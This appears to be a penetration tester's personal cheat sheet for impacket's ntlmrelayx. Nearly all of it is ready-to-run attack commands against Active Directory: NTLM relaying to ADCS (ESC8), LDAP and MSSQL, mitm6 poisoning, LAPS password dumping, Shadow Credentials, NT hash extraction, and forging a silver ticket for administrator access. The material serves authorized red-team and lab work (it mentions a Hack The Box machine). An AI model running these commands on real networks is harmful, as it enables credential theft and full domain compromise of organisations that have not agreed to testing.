# ntlmrelayx.py

ntlmrelay is part of impacket.

# Install

I usually use the embedded version in exegol, but that doesn't always play nice, so I like to go:

python3 -m venv venv
source venv/bin/activate
python3 -m pipx install impacket

Then just run things directly, like:

ntlmrelayx

# Logging output

ntlmrelayx YOUR-COMMANDS --output-file output.log

# Add date/timestamp to logs

Add -ts somewhere in the command:

-ts

# Relaying with ADCS ESC8 attack

ntlmrelayx -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs -debug --template 'DomainController'

# Escalate privileges via relay

If you've already added a computer record to the environment (using something like powermad), you may be able relay to LDAP and assign escalated privileges to that computer object! For example:

ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$

Then, if you've found a system running WebClient, you could potentially coerce authentication to a DNS record you've added and pull off the privesc!

# Delegate access attack while poisoning with mitm6

ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access

# Setup SOCKS relay to a list of hosts

In this example we have a targets.txt file full of entries like this:

smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6

We setup the SOCKS relay like so:

ntlmrelayx.py -tf targets.txt -smb2support -socks

# Dumping LAPS passwords

If you want to just setup a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify you want to dump LAPS passwords:

ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps

# Shadow Credentials attack

My favorite write-up on this attack is probably this one from GuidePoint security.

# Find hosts with WebClient running

The webclientservicescanner works well for this.

# Add a rogue DNS record pointing to your machine

Try dnstool.py for this.

# Setup relay for the Shadow Credentials attack

ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da

# Trigger HTTP auth from VICTIMS

Head to our coercer page for more info.

# Use the PFX to get a TGT

gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass WHATEVER-PASS-IS domain.com/VICTIM$ cert.ccache
export KRB5CCNAME=cert.ccache

This will spit out a bunch of information including the encryption key, which you can then use to extract the NT hash of the machine:

getnthash.py -dc-ip IP.OF.A.DC -key XXXENCRYPTION KEY GOES HEREXXX

With the NT hash, you can forge a sliver ticket. First get the SID of the domain. Below is a way to get that by querying the Administrator account which will give you the domain. Just be sure in the ticketer.py command that follows that you remove the RID (last part of the SID):

pywerview.py get-adobject -d domain.com -u lowpriv -p 'password' -t IP.OF.A.DOMAINCONTROLLER --sam-account-name administrator --attributes objectsid

Forge the ticket!

ticketer.py -domain domain.com -domain-sid xxxBE SURE TO LEAVE OFF THE RID!!!xxx -nthash yyy -spn cifs/VICTIMSYSTEM.domain.com administrator

# Shadow Credentials attack (with LDAP shell)

I followed these instructions to pwn a HBT: Mist machine for this.

# Get a venv setup

python3 -m venv venv
source venv/bin/activate

# Install the appropriate impacket fork

git clone -b interactive-ldap-shadow-creds https://github.com/Tw1sm/impacket.git
cd impacket
pip install --upgrade pip
pip install .
pip install setuptools

# Run ntlmrelayx with sudo permissions:

sudo ~/venv/bin/python3 impacket/examples/ntlmrelayx.py -smb2support -t ldap://ip.of.a.dc -i

# Interact with the relay

nc 127.0.0.1 11000

# Relay to MSSQL with interactive shell

ntlmrelayx -t mssql://192.168.7.7 -i -ts -smb2support